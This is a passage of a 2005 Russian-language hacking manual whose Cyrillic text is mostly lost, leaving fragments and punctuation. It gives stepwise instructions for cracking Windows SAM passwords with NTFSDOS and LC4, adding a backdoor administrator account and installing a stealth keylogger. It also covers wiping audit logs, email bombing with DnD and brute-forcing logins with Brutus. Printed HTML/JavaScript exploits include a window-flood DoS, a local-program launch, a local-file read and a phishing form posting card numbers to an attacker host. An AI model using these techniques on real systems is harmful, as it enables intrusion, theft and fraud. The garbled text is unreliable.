004.056.53(075.8)
32.973.202-0878-1+32.973.2-018.278-1
Alex Atsctoy.
: . . .: [, ] /
Alex Atsctoy. .: , 2005. 192 .: .
ISBN 5-93673-036-0.
CIP
? ,
, - .
: www.3st.ru
E-mail: post@triumph.ru
ISBN 5-93673-036-0
, 2005
, 2005
, 2005
1.
2. Windows 2000/XP
3.
4.
5. Web browsers
6.
7. Hacking ICQ
8. Web sites
9. DoS attacks
10. Windows 2000/XP
11.
1.
Web
Web
NTFSDOS Pro
SAM
********
4.
5. Web
HTML
Web-
6.
7. ICQ
ICQ
IP- ICQ-
ICQ-
ICQ
ICQ-
8. Web sites
Web-
Web-
Web-
IIS 5
Web- Teleport Pro
HTML
Web
9. DoS attacks
DoS
Smurf
Nuke
Teardrop
Ping of Death
Land
DoS
TCP/IP
NetBus
PhoneSweep 4.4
PhoneSweep 4.4
PhoneSweep
1.
, - ,
, , , . , , . ,
( ).
!!!
, , .. , , 2 () .
.
,
:
log:
:
1:
2:
em: e-mail
.
,
! . 13.06.1999, ..
.
!!!
,
http://www.super-internet-provider.ru
, .
, - , , , , , , , . , , ,
Web- .
-
, . - , . ,
, , , ,
.
- ,
, .
- , , , . ,
, !
, , ,
.
, , .
- , 80- , , , , - ,
.
.
, , , ,
. , , , . ( !),
.
-
(-, !)
,
, .
, ,
-
,
.
, , ,
, ,
, . , ,
,
, ,
, -
.
,
.
, . , , , , , ,
, .
, , ,
. , - ,
, ,
, .
20-
- .
?
, , , , ,
, - , -
, ,
(, -
)
, -
. , - , .
, , .
( ).
, :
(, . ).
, ,
, .
Hard DISK [ Fdisk.exe] n- ( , ) .
! , ,
!
[ 24% ]
, POWER - !
IDE- .
, . , , , - , , , - , HARD DISK
- , - , - , .
, Must die,
.
Windows,
, .
,
, .
, Windows ? ,
, - ? , , , ,
.
, ?
21 ( ).
:
:
, , ,
, ,
. , .
:
, .
. , , ,
.
:
. .
, . .
, ,
.
.
: ,
.
, ? -
, , ?
,
?
, - .
, , , , , ...
. , ,
, (, ,
) . , :
- , 16 19 .
( 80%) , nerd.
: 1) , ; 2)
. (, ?
- ).
Windows Unix,
TCP/IP
, , C++, Perl, Basic.
, . - , - 19- . ,
,
, , .
,
, , .
, , -, , .
, , , . - , , , . ,
. , ,
- , - .
.
, , , . , .
, , .
, ,
.. , .
, , . , -
,
, , .
, ,
,
,
. , , : - .
,
. ,
, , , , ,
[3].
, , , . ,
.
"
, , , , .
- - , .
- , , , . ,
, ,
.
, ,
, ,
. , . , - , . , , ,
.
,
, (.. ,
). ,
, ,
, , , .
, ,
, , ( rootkit -
). - UNIX,
Windows 2000 , 4,
, , , , Windows, , .
. IP-,
. -
. , - ,
, -,
- ,
.
, 4 -
, ,
.
- ,
- . -
, ,
. ,
DoS ,
IDS.
. , .
, - , , .
, ,
.
,
.
; , .
- ,
, , , , .
, , , . , [3] , . ,
, [3] !
[1]. , (
). ,
, , - . , , ,
, ,
. ,
. , - , ,
.
, . , ,
,
. - .
. Web- (, RIPE NCC http://www.ripe.net). Web-, WhoIs,
, ,
.
, , , Web-. Yahoo
(http://www.yahoo.com), Rambler (http://www.rambler.ru).
. , , , , . , , , [3].
Google
(http://www.google.com), . , , C:\WINNT, Windows NT/2000. - ,
.
, , Teleport Pro.
, Web-
, .
, , HTML Web-
- ,
, HTTP .
, , , , ,
, , , ( 1 1 ).
, Web- - ,
, . , .
, ,
,
. .
-, , , , ..
, , . - SAM
(Security Account Manager - ), .
SAM - ,
3 ,
, L0phtCrack LC4 (http://www.atstake.com).
-, , , , Windows , MS Office . , .
,
3 . Office Password 3.5
(http://lastbit.com/download.asp) Windows - , , .
Revelation SnadBoy
(http://www.snadboy.com). , 18
***** - ,
, -
Revelation .
,
, , , ,
, .
.
-
?
, ,
- , - .
Welo
- . , Web-,
,
-.
, Web, Web-,
Web- ,
. Web- 5 .
,
. , Web-,
.
. , , 6 Death & Destruction Email Bomber -
. , . , , , 6
Brutus.
, , ICQ.
- IP- ICQ-
( flood - )
ICQ- , ! - , 7 ICQ Flooder, ICQ-MultiVar, .
- , IP- ICQ- ICQ,
, .
, .
Web
Web- , , , DoS, - .
, IIS 5 (Internet Information Server - ) Microsoft
.
Web- , Web-, HTML . 8 , , CGIScan
Brutus, IIS
. 9 ,
DoS.
Web- ,
,
Web-. , DoS
, - , .
Web , , CGI-. ,
, .
TCP/IP , ,
, , IP-,
, .
,
.
10 - SuperScan, foundstone_tools
(http://www.foundstone.com).
W2RK (Windows 2000 Resource Kit -
Windows 2000), ,
W2HK (Windows 2000 Hacker Tools - Windows 2000).
,
, , .
flepex&am
, , . , ,
-
, .
, . ,
, .
- . , ,
, ,
.
- SpyNet, .
, , VPN (Virtual Private
Network - ) , , -
. , , , ,
, .
, W2RK (
Windows 2000) W2HK - Windows 2000,
. Windows (Explorer) Windows, . ,
, , password, .
[3], ,
,
, .
, , ,
password.txt , ISP.
, , . , NTFS Windows 2000/XP,
, ,
PGP Desktop Security.
11~
- ,
, .. . Web- ,
(., ,
http://www.securitylab.ru). 8 IIS. CGIScan
, . , 22
- , , IIS 4. Web
, .
- , , . .
, ; , , - ( ). , , - -,
, - .
- , .
- ,
. 10
NetBUS, . , .
- ,
, , .
. - , ,
. , , -
- , ,
... , , .
-
, , , ,
. ,
,
( ), ,
? , , -
,
, ?
, - ?
, , ( ),
, , , -
.
,
.
. ,
, ,
, .
, ,
.
, ,
,
, .... , , - Windows 2000/XP.
2.
Windows 2000/XP
Windows 2000 TCSEC (Trusted Computer System Evaluation
Criteria - ) .
,
Windows 2000, , .
.
.
.
, - ,
, ,
, , .. ,
- .
, ( log in - ), - , . ,
, ,
, .
Windows NT/2000/XP SAM (Security
Account Manager - ). SAM
, , . SAM - , 3 .
, .
,
, , .
, -
, , . , , ,
.., , , ,
. , ,
-, (,
, ) ,
, , .
, , , , .
Windows NT 4 NTLM
(NT LAN Manager - NT). NTLM
Windows 2000/XP. NTLM, , LM (LAN Manager - ),
, Windows NTLM.
Windows 2000/XP Kerberos, , ,
. - Windows 2000/XP, -
Windows 2000 Kerberos.
- ,
Windows 2000/XP - . , ,
, ,
- .
, , , .
- . Windows , , , . ,
, .
, , ,
, ,
.
, Windows NT/2000/XP
.
, . ,
, . , ,
. ,
(Guest),
, - (User),
.
, , ,
. , (Administrators), ,
-
, , ...
urn
,
, .
, , - , .. ,
. ,
, . ,
,
, , ,
.
Windows NT/2000/XP,
, , - .
, 4, ,
, .
,
, , , ,
, , .
,
11 , , .
, , [2], [6],
, -
Windows 2000/XP, ,
.
Windows 2000/XP
Windows 2000/XP SRM
(Security Reference Monitor - ). SRM Windows 2000/XP, .. .
Windows 2000/XP , , SRM. .
LSA (Local Security Authority - ), ,
, LSA.
, LSA . , LSA , .
SAM (Security Account Manager - ), . , LSA.
AD (Active Directory - ),
AD .
,
LSA.
,
, :
, ,
Kerberos; , .
, , , :
, ,
, /, .
SAM AD ,
LSA . , , , ..
, SRM.
, ,
Windows 2000/XP. ,
. -,
(SAM AD); -, . ,
.
SAM
, , , ,
. , , , SAM AD,
. SAM %root_directory%\system32\config\sam,
AD - %root_directory%\ntds\ntds.dit. , , ,
- ! .
,
, , ,
, Windows 2000/XP. SAM
Windows NT 4 , NTLM , ,
,
LM,
Windows. LM , SAM , , L0phtCrack
(http://www.atstake.com) ,
.
L0phtCrack SAM, , , pwdump
(http://www.atstake.com). Windows - pwdump SAM
, L0phtCrack,
- ,
LM - .
Service Pack 3 Windows NT 4, , Syskey
() , SAM.
Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey
,
. ,
- ,
3-4 , . ,
1 Microsoft, - Microsoft!
Windows. ,
, .
Windows 2000/XP
, , , , ,
? .
, , Windows,
SID (Security
IDentifier), 48- ,
. Windows 2000/XP SID, Windows 2000 SID.
. ,
, ? (, ..)
Windows ACL (Access Control List -
), (Access Control Entries -
). SID
. ACL
, , (Explorer) Windows,
Windows 2000/XP.
ACL.
Windows 2000/XP (, ) LSA , SID 8 , .
, ,
SRM 8 ACL , , .
, , - . ,
, - , . , .
- ACL , Windows 2000/XP . , (, http://www.rootkit.com). ,
ACL !
, - , ? , . ,
, Windows 2000/XP.
Windows NT 4 , ..
, Windows 2000/XP
ADS
(Active Directory Services). ADS Windows 2000,
Windows 2000 Server. , ,
.
- , , ,
, - ADS , , .. . , ,
IP- .
ADS , , - ,
.
OU (Organization Units), ,
, , , , ,
, OU. OU - , .. OU , OU .
Windows 2000/XP
, . , .
Windows 2000 , - ,
Windows 2000 Windows NT. , , .
Windows 2000/XP
, . ,
,
. , .. .
, . , domen.
: comp1.domen, comp2.domen...
, ,
, , domen1, domen2,... , ,
.
, domen1 domen2 , domen2 domen1, domen2 comp1.domen2.domen1, comp2.domen2.domen1, ... compN.domen2.domen1.
domen1 domen2 , forest, . , domen1 comp1.domen1.forest, comp2.domen1.forest , domen2
comp1.domen2.forest, comp2.domen2.forest, ....
.
, - ,
:
.
(Universal group), , , .
(Global Group),
, ,
.
(Local group domain),
, .
ACL
. -
.
, , AD,
, , .
- AD SAM,
, SAM.
AD , AD, ,
( 10 ), AD , , , . , . ,
, ,
Windows 2000, . , , LC4
L0phtCrack .
, , - - .
Windows 2000
Windows 2000
, . - ,
, -, ,
. -, , , [7], , . -
, ,
- ,
. .
- ,
- , AD. - - ,
- -.
- ,
.
. -,
- . -,
, - ,
, , , .
, , , . . - , , ,
LM, - LM
( , , [3]). Microsoft NTLM ( Service
Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4).
, , Windows 2000 Kerberos,
- ,
.
.
, Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.
-
TCP- 88 , Kerberos,
. -
LM NTLM, L0phtCrack
.
, - ,
. , ?
, , ,
.
, ,
.
,
. , , ,
.
,
. , , Windows 2000.
,
Microsoft , ,
. Windows XP
Windows.
Windows 2000/XP [7], . , ,
,
.
, , Retina, [7].
-, . -, , , VPN (Virtual Private
Network - ). VPN ,
. VPN
, .
, , , ,
(Bruce Schneier),
(Applied Cryptography), - .
, - ,
, .
- , ..
.
Windows 2000/XP , .
SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
.
Windows,
.
Windows 2000/XP, / ADS ,
Microsoft Press Windows 2000.
&
Windows 2000/XP, ,
, , , ? , 2,
,
,
, . . ( ,
- . .)
- ,
. , , ,
( - ...).
, , . , , , ,
, ,
( - ).
? , -
, . - .
, . ,
-
, - . , .
-, , - - , Windows. , ,
,
,
.
, , ,
(. 1), -
, . -
, , , - -.
-, , , Windows BIOS . , Windows 2000/XP .
,
- (, ). , , - MS-DOS !
- ,
. -, BIOS , BIOS
. .
-, BIOS ,
NTFS, Windows 2000/XP. , MS-DOS - -
, - .
, -, , ( - - ,
! , . , , ),
Windows 2000/XP. -
NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS
MS-DOS. ,
, Windows 2000/XP
.
- , . NTFSDOS
Professional - .
1515 fro
NTFSDOS Pro . Windows NTFSDOS Professional
NTFSDOS Professional Boot Disk Wizard (
NTFSDOS Professional). ,
NTFS. .
, FORMAT/S SYS
MS-DOS.
Windows XP Create an
MS-DOS startup disk ( MS-DOS).
> * NTFSDOS Professional
(Start Programs NTFSDOS Professional). (. 3.1).
[Figures 3.1 and 3.2: NTFSDOS Professional Boot Disk Wizard screens]
[Figure: NTFSDOS Pro wizard, selection of additional DOS character sets (code pages)]
> Next ().
NTFSDOS Pro
(. 3.4).
Windows
NT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386
Windows NT/2000/XP, - Service Pack.
> Next ().
NTFSDOS Pro (. 3.5).
[Figures 3.4 to 3.7: NTFSDOS Professional Boot Disk Wizard screens, including the Windows directory and target location steps]
(. 3.7) Next
() . Windows XP NTFSPRO.EXE
, NTFS .
Windows NT/2000 . NTFSCHK.EXE,
NTFS.
(. 3.8)
NTFSDOS Professional.
[Figure 3.8: NTFSDOS Professional Boot Disk Wizard completion screen]
5
SAM, SAM.
NTFSDOS Pro, MS-DOS SAM /system_root/system32/config .
- , , LC4 - L0phtCrack
(http://www.atstake.com).
. 3.9 LC4 Import ().
[Figure 3.9: LC4 window]
, LC4
, . SAM :
> File * New Session ( * ). , . 3.9.
> Import Import From SAM File ( *
SAM). SAM.
> SAM, 1-3.
> (. 3.10) Session Begin Audit
( ) .
[Figures 3.10 and 3.11: LC4 window with 7 accounts imported from the SAM file: Administrator, ASPNET, Guest, HelpAssistant, IUSR_ALEX-3, IWAM_ALEX-3, NewUser]
, - 007 , , .
, , 5
Pentium 2 400 . 45
- , LC4
.
LC4 Auditing
Options For This Session ( ), . 3.12.
[Figure 3.12: LC4 "Auditing Options For This Session" dialog with Dictionary Crack, Dictionary/Brute Hybrid Crack and Brute Force Crack sections]
, LC4 :
Dictionary Crack ( ), Dictionary
List ( ), . LC4
, ,
. ,
, , , ,
.., .
Dictionary/Brute Hybrid Crack (/ ),
, / ,
, .
Password???, .
Brute Force Crack ( ), .
,
. Character Set ( ) ,
Custom (), Custom
Character Set (List each character) ( ( )) .
Distributed ()
. File Save
Distributed ( )
.
LC4
Windows NT/2000/XP.
Windows,
Windows 95/98, Pwltool.
'
Windows , , . MS Office
(http://www.elcomsoft.com), - OfficePassword 3.5.
, , *******
Revelation SnadBoy (http://www.snadboy.com).
, ,
AZPR , Passware Kit,
http://www.lostpassword.com.
Windows - , /, , , Window - OfficePassword
.
OfficePassword 3.5
OfficePassword 3.5
Lotus Organizer,
MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP
VBA, MS Office.
OfficePassword 3.5
.
Word
password.doc, -
?
, Windows,
password.doc, (. 3.13).
- ,
OfficePassword 3.5
:
> OfficePassword (Start
Programs * OfficePassword). OfficePassword (. . 3.14).
[Figure 3.13: Word password prompt]
[Figure 3.14: OfficePassword (demo version) main window]
- , .
> , Select recovery
mode ( ), . 3.15.
[Figure 3.15: OfficePassword "Select recovery mode" dialog (Automatic, User-defined, Guaranteed recovery)]
> Select recovery mode ( )
:
Automatic ( ), ,
Next (), ,
.
User-defined ( ),
. .
Guaranteed recovery ( ), , , ,
.
> Next
[Figure 3.16: OfficePassword message "Password found: '007'"]
(). , ,
(. 3.16).
OfficePassword 3.5 , ,
. - , .
, - ,
.
, , 24-28
, . ,
, .
, , - ,
.
******
, - ,
, (, ), , ******.
, , , . - , , ,
. ,
.
,
-,
. ,
,
NetBus . . 3.17
Revelation Snad (http://www.snadboy.com) NetBus
NetBus.
[Figure 3.17: SnadBoy's Revelation window]
- , - , -
, , - .
: .
, 4.
-
, ,
, . , , ,
. - ,
backdoor - , ,
.
&*
, , , , .
MS-DOS: NET USER < > <> /ADD,
, NET
LOCALGROUP < > < > /ADD, . . 3.18 .
C:\>net user NewUser 00 /add
The command completed successfully.
C:\>net localgroup Administrators NewUser /add
The command completed successfully.
Puc. 3.18.
NewUser
NewUser
, , .
,
,
.
- , . Windows - Startup
Document and Settings ( ) , .
Startup, All users, .
,
, . , (), .
IKS (Invisible KeyLogger
Stealth - ), - http://www.amecisco.com.
- ,
. - , , .
IKS -
http://www.amecisco.com, Invisible
KeyLogger 97 8 10 , .
Windows NT/2000/XP, , , 1^' l+ir^n+l0"8"]. IKS
Windows NT/2000/XP. , IKS , .
IKS .
Web- iks2k20d.exe , . 3.19.
[Figure 3.19: IKS installer dialog (Standard Install, Stealth Install, Uninstall tabs)]
Install Now ( ) -
. IKS . ,
IKS , iks.sys,
. ,
dataview.exe, . 3.20.
[Figure 3.20: IKS log viewer (dataview.exe) settings]
Go! () , . . 3.20 ,
, .
, IKS , . iks.sys system_root/system32/drivers,
( Regedt32 . 3.21).
[Figure 3.21: Registry Editor (Regedt32), HKEY_LOCAL_MACHINE on Local Machine]
, BIOS,
. , . , ,
. , - , , , , ( ), , ,
.
- ,
,
.
Windows 2000/XP
. Windows 9x/Me, -
, PGP
Desktop Security, .
Windows 9x/Me ,
.
, , , , - ?
. .
4.
- , ,
,
. , , , , , - , , ,
. , ,
- , , , .
, -
. 1 , 50%
,
- , , .
, ,
,
. , ,- , , . ,
( ).
, - ( ).
,
. , - , , , .
.
, , ,
. , , , -
. , privacy - . ,
, , , ,
, ,
.
, [10],
(, ) , - , - privacy. ,
, , ,
, , - ,
. .
, , ,
,
, . , . .
-, . ,
, .
, ,
, - ,
.
-, .
. , Web-
, Web, .
, , ,
(, ).
, , - , , - . ,
? , , . :
, .
, Web-.
, -
.
,
.
Windows,
(Explorer) , .
,
Windows.
,
MS Office.
, , ,
.
? , .
. ,
, (Explorer) , . ,
(Delete) Windows , , .
Windows , , , , , MS Office.
, , (Show hidden files and folders)
(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).
[Figure 4.1: Windows Folder Options dialog]
- Word
(Delete) Windows ,
. . 4.2,
, Word,
, ,
.
[Figure 4.2: Explorer view of a folder with leftover temporary Word files such as ~WRL0002.tmp and ~WRL1120.tmp]
, - ., .WBK, 60
, ~$. ,
, , Windows, ,
,
Windows. , - , , . ?
, MS Office, ,
, , Norton Utilities.
- Cleaner Disk Security
(http://www.the-absolute.net/sware/index.html#Clndisk).
,
, , . , . ,
, . - , , .
( 100%) .
. 4.3 Clean Disk Security 5.01
(http://www.the-absolute.net/sware/index.html#Clndisk), ,
( ).
Clean Disk Security 5.01
Erase
fully ( ).
, , - . 4.3. Clean Disk Security 5.01
(
FAT NTFS). , , .
Windows, Windows,
Temp ( , , )
. -,
, ,
(cookie).
, (. 4.3).
. 4.3, :
Simple () - 6 ,
. ; 1 .
NIS - 7 (.. ) .
Gutmann - 35
(.. ).
(Peter Gutmann) . . ,
( ).
Test mode ( ) - #10
ASCII.
. , Clean Disk Security 5.01
, , .
, [10]. -
, : (UPS);
. , ,
.
,
.
, , .
, ,
. -, ,
, .
, . , , , Norton Utilities, , / , .
, , [10].
( ) - , ,
regedt32.
. , ,
NTFS.
, ,
, -
. , - - Web- .
, , .
.
, ,
.
&
, , .
. ,
.
, . ().
, ,
, .
( Web-,
, , ),
, , ,
. , , .
(., [5],
[10], -
, , ). , -,
. , , , .
, -.
-, , .
. , . , , ,
. -,
- ,
!
- , ,
, .
, , !!!
Web- ,
. HTML- Web-.
Web- , , Web-,
.
,
, Web-
http://www.privacy.net/analyze, , Web- .
. 4.4, , Web-, - .
[Figure 4.4: privacy.net "Analyze Your Internet Privacy" page in Microsoft Internet Explorer]
, ( )
WhoIs,
1,
.
, - , IP- . Web-
Web- , IP- -
...
, , Web-, ( anonymizer -
). , Web-,
,
. , ,
http://www.anonymizer.com. (. 4.5).
[Figure 4.5: Anonymizer.com home page]
Go.
- ,
- FTP-, , , . , , ,
Web-, ,
.
( ), .
[Figure 4.6: proxy server settings dialog]
- , , , .. Web-
-,
.
- .
- HTTP, FTP-,
Web-,
FTP.
- , .
- .
- . , ,
, Web-, , Yahoo.
proxy+server+configuration+Explorer,
Web-, ,
-.
- ,
, .
, , , ,
, , , .
, , , 3 IKS. , , NetBus
(http://www.netBus.org).
, , ,
, , .
:
- , (
- ).
IP- , -,
.
, , . , Back Orifice 2000
31337 , , 31336, , , .
,
Windows NT/2000/XP.
, auditpol
W2RK, - , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
(Event Viewer) Windows 2000/XP.
, ,
(Hidden).
Windows, .
, .
,
, , explorer.exe,
Windows
Windows.
, EliteWrap, [11].
( Rootkit - ). ,
, .
.
Tripwire (http://www.tripwiresecurity.com),
, Cisco
Systems (http://www.cisco.com)
. Windows 2000/XP , ,
, [7].
, ,
, -
, .
, / .
Windows NT/2000/XP, , auditpol.exe
W2RK. ( )
, . :
System                   = No
Logon                    = No
Object Access            = No
Privilege Use            = No
Process Tracking         = Success and Failure
Policy Change            = No
Account Management       = No
Directory Service Access = No
Account Logon            = No
//ComputerName - , /disable
. auditpol.exe - , , ,
, ( auditpol /? ).
Windows 2000/XP :
> (Start)
(Settings Control Panel).
[Figure 4.7: Event Viewer window]
(Control Panel)
(Administrative Tools).
(Event Viewer).
Event Viewer ( ) (. 4.7).
(Security Log);
.
Clear all Events ( ). , . 4.8,
.
[Figure 4.8: confirmation dialog]
> (No), . .
,
- ! ,
-
. , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
, ,
Windows NT 4, Windows 2000.
.
C:\els004>elsave -s \\ComputerName -
-s , -
. , . elsave /? ,
.
, elsave.exe . - elsave.exe
Windows ( (Start), AT
MS-DOS). System, .
-
( , - ).
, , . , , ,
, .
- ! 50%
( - !)
- !
- , , [9]. , , Norton Personal Firewall, PGP Desktop Security .
, ,
, .
#
, ,
, ,
. , ,
,
, , .
, 90- , .
, , .
, , ,
.
, ,
, TCP/IP.
- ,
.
- , , .
,
.
, , , (, ).
, . ,
, , , Word ..,
, , ,
.
WWW (World Wide Web - ), Web (). Web - ,
Web . -
1961 , Web 1992 .
, , -
. Web - Web ,
, Web.
Web .
Web, Web URL (Uniform
Resource Locator - ),
Web.
,
Web HTTP (Hyper Text Transfer
Protocol - ).
, Web, HTML (Hyper Text Markup Language -
).
, ,
, - HTML CGI HTTP.
Web , , Web, , - , , - 1 Web
.
Web , , Web - HTML Web,
( browser, , , ),
Web Web-.
HTML - Web,
Web,
, , , , , , , , . , HTML
, Web, , Internet Explorer (IE) Netscape Navigator (NN).
Web
: Web - , HTML Web , , ,
HTML, , - Web? -
HTML? . ( )
, , Web-.
, DoS , Web . , ,
Web,
, .
open ( ) ,
JavaScript MainPage.html
, HTML 8. 1.
8.1.
HTML Web-
<HTML>
<SCRIPT LANGUAGE="JavaScript">
generation();
function generation() {
  var d = 0;
  // Unbounded loop: every pass opens one more browser window
  while (true) {
    a = new Date;
    d = a.getMilliseconds();
    window.open("MainPage.html", d, "width=250,height=250");
  }
}
</SCRIPT>
</HTML>
HTML, , . Windows 2000/XP
IE 5 IE 6 HTML,
.
IE 5 IE 6
.
tlep
- . , 8.2
... (
).
8.2.
HTML Web-
<HTML>
<SCRIPT language=JAVASCRIPT>
var p = external.... ;
</SCRIPT>
</HTML>
HTML 8.2 IE 5
6 var p 8.2.
( [3], [10]). , ,
-
HTML .
[3] HTML,
<OBJECT> CLSID.
8.3. HTML, .
8.3.
HTML
<HTML>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='C:\windows\system32\calc.exe'>
</OBJECT>
</HTML>
8.3 IE 6 ,
. 5.1.
Web
[Figure 5.1: browser window opened on a local HTML file]
C:\Windows\
system32\calc.exe, , .
Web- ,
JavaScript, HTML- Web-, . ,
IFRAME, Web- .
8.4 HTML, ,
C:\security.txt.
8.4.
Web-
<HTML>
<BODY>
C:\security.txt <BR>
<IFRAME id=I1></IFRAME>
<SCRIPT>
I1.navigate("file://C:/Security.txt");
setTimeout('I1.navigate("file://C:/Security.txt")',1000);
</SCRIPT>
</BODY>
</HTML>
8.4 IE 5 IE 6 , . 5.2.
[Figure 5.2: browser window showing C:\security.txt]
. 5.2,
security.txt -
-
Web-.
,
,
, JavaScript . 5.2. Web-
.
Web-
NavigateComplete2, [3].
Web-caumo&
Web, , , - Web- . ,
Web- ActiveX, .
,
,
, , , , -,
- ..
- , ,
. ,
- .
Web
- ,
- Web-,
. ,
,
.
, Web - . , Windows
Web- Microsoft NetBus.
Web-, . Web , . 8.7 HTML, -.
8.7.
HTML
<HTML>
<HEAD>
<1>
Bubliki&Baranki
!!!!!</TITLE>
</HEAD>
<BODY>
<SCRIPT TYPE=ntext/javascript">
function falsify() {
z=window.open("about:Internet-
Bubliki&Baranki
");
z.document.open();
z.document.write
("<11<>
Bubliki&Baranki</TITLExHl>3aKa3
VirtualAir</Hl>
<FORM
ACTION^'http://www.AnyHackerSite.com/cgi/GetCardNumber'
METHOD=post>yKa5KMTe <>< TYPE=text><BR>VKa*oiTe
<><INPUT TYPE=textxBR>yKa*aiTe
KapTO4KH<BR>< INPUT TYPE=textxBR><INPUT
TYPE=checkbox VALUE=OK>H VirtualAir<P> <INPUT
TYPE=submit VALUE=''></PORM>");
z.document.close();
}
</SCRIPT>
<H1 ID="header"> VirtualAir</Hl>
Bubliki&Baranki VirtualAir,
! < HREF="javascript:var a;" onclick="falsify()"
onMouseOver="window.status=
'http://www.Bubliki&Baranki.com 1 ;
11
return true;
onMouseOut= "window. status= I i n > ,
</A> Bubliki&Baranki!
</BODY>
</HTML>
8.7 IE 5 , . 5.3.
- http://www.Bubliki&Baranki.com
Rog&Kopito
.
Web-
Rog&Kopito
Bubliki&Baranki,
Web-
Rog&Kopito .
(, ,
.)
,
Web- Bubliki&Baranki.
Web, . 5.4.
Web-
. 5.4
.
[Figure 5.3: Web page of Rog&Kopito]
[Figure 5.4: VirtualAir form, Bubliki&Baranki]
Web
CGI- GetCardNumber,
Web-, Rog&Kopito:
<FORM ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber' METHOD=post>
-
(Address) ,
,
, , .
IE Address Javascript.
URL HTML IE 6, ; , IE 6 HTML
. !
, ,
Web- - . , ,
, .
, , ,
, Web . .
, , , Web.
,
Web-
. . -, , ,
, .
.
, ,
.
- Web-, -
, .
:
. , ,
SSL.
Web-
.
.
, , ,
. .
, . , , ,
, . .
Web - .
,
. , , , , Web . ,
- Web
, , - , , .
, ,
4 IE Netscape, , 5 6 .
, ,
.
6.
, ,
, ,
, .
, . , , .
, ,
,
, ,
... , - !
- (, , , 1,
). ,
,
,
! ,
. ? -
-
- .
( Flood - ,
) ( Spam - , . Spam ). (..
), , ,
.
, -
SMTP-. Death & Destruction
Email Bomber ( & ) 4.0,
DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
, . ,
DnD, .
Avalanche - Avalanche
DnD, .
. 6.1 DnD 4.0.
[Figure 6.1: Death & Destruction Email Bomber (DnD) 4.0 main window]
DnD Settings
(), DnD (. . 6.1).
DnD Settings ()
:
> SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net.
> Spoof Host ( )
, .
, .
Randomly Change ( ) ,
SMTP-.
>
SMTP-,
Edit Server List ( ). Random
Server List ( ), . 6.2.
[Figure 6.2: DnD Random Server List dialog]
SMTP-
Random Server List ( ) .
Submit ().
Size of Bomb ( ) (. 6.1)
:
# of messages to send ( )
.
10.
Never ending bomb ( ) .
[Figure: DnD mail headers dialog (X-Mailer, X-URL, X-Sender, X-Date, Return Path, References, Priority, X-Authentication Warning)]
, DnD , . , ,
.
, Clone ()
E-Mail bomb ( ) Bomber Spawn 1 (
), . 6.6.
[Figure 6.6: DnD Bomber Spawn 1 window]
, Bomber Spawn 1 ( ) E-Mail bomb ( )
-
SMTP-. ,
SMTP-. - - , !
- .
, , ( - ).
> , DnD Clones Load Multi Clones ( * ). Number of clones (
), . 6.7
[Figure 6.7: Number of clones dialog]
- !
> Number of clones ( ) ( 5-6) .
Bomber Spawn
( ), 1 -
. Send Bomb ( )
. -
!
&&
! , - ,
! DnD
, , Mailing lists ( ). Subscribe
joe lamer to mailing list ( ),
. 6.8, ,
Euro Queer ( ), Mormons (), Family Medicine
( ) -
!
[Figure 6.8: DnD mailing list subscription dialog]
,
, DnD , ,
, . ,
Extras Pword generator ( * ).
Randomic Password Generator ( ), . 6.9.
, How many characters? (
?) ( - 8 )
: Use Both ( ) - , Use numbers ( ) - 90
Use
letters ( ) - . - , ,
.
[Figure 6.9: Randomic Password Generator dialog]
Extras ()
- . 6.9.
SMTP- (
SMTP Remote ( SMTP)),
( Raw Port ( )).
, ( , SMTP). Other Tools
( ) . - , ,
.
, - ;
. ,
, . , ( ). , .
. , ,
- (
IMAP) , .
- .
Brutus Authentication Engine Test 2
( Brutas , 2),
Brutus AET2 (http://www.hobie.net/brutus). . 6.10
Brutus,
, FTP, HTTP, Telnet
NetBus.
[Figure 6.10: Brutus AET2 main window]
,
Brutus ( 8
Brutus IIS). , alex-1 .sword.net,
kolia. , ,
- ,
.
.
> Brutus - 2 (. 6.10) Target () , alex-1.sword.net.
> () ,
.
> Connection Options ( ) Use Proxy ( ),
-
.
> Authentication Options ( ) Single User ( ) -
.
User file ( ) , .. - kolia.
> Pass Mode ( ) Brute Force
( ). Brutus ,
. 6.11.
Puc. 6.12.
Brutus - Brute Force Generation (Brutus -
) - ,
, . ,
- , Min Length ( ) 3, Max Length ( ) - 4. , Digits only
( ).
.
> Start () Brutus - 2
Brutus - 2. . 6.13.
Puc. 6.13. 1.
Positive Authentication Results (
) , kolia - 0007.
, Brutus 10997 alex-1.sword.net (
11000). 5 Pentium 3
1000 ,
Ethernet 10 /.
,
, Brutus (
). -, , , ( 8 !),
, (, &$ ..).
!
Brutus - Brute Force Generation (Brutus - ) 8 ,
Full Keyspace ( ). Start
() Brutus - 2
- 6 095 689 385 410 816 - , !
12 ?
, , ,
(., , [10]). Brutus,
Pass
Mode ( ).
( 100 000), ,
. , password, parol, MyPassword
- Web- -
.
-,
,
, Ethernet, 30-50 / (
). -
. -
, - , ,
,
.
. , , , ,
, . .
- , .
IIS Brutus 8 , - . ,
, . , , ,
- , -
! :
!. .
, , ,
. 1, , , , . - ,
, , ,
. ,
- ( - ),
.
, - ,
. . ,
TFTP 1-1 , 1-1 . , TFTP
, .
TFTP
, ,
, . , , , ,
,
.
. , ,
( ) . ,
, , Web- - .. ( ,
). . - , , , -.
. - , ..
,
- , ,
. , ..
, -
-
. , 2002 ., , ,
.
Web-. . . ...
(
). Web-, ,
?, .
, , ?, ?,
? . -
, ,
, ,
. , , , , ,
. ,
, - ,
,
repa_parenaia, - !
- . , , ,
,
. 97
4 - 5830
- , , ,
- , . .
, - .
,
. , (
) , -
!
.
,
8 ( 12) , , .
,
DnD .
.
, - , Norton Antivirus
McAfee VirusScan.
,
- PGP Desktop Security.
, .
, - , ,
, .
- - , .
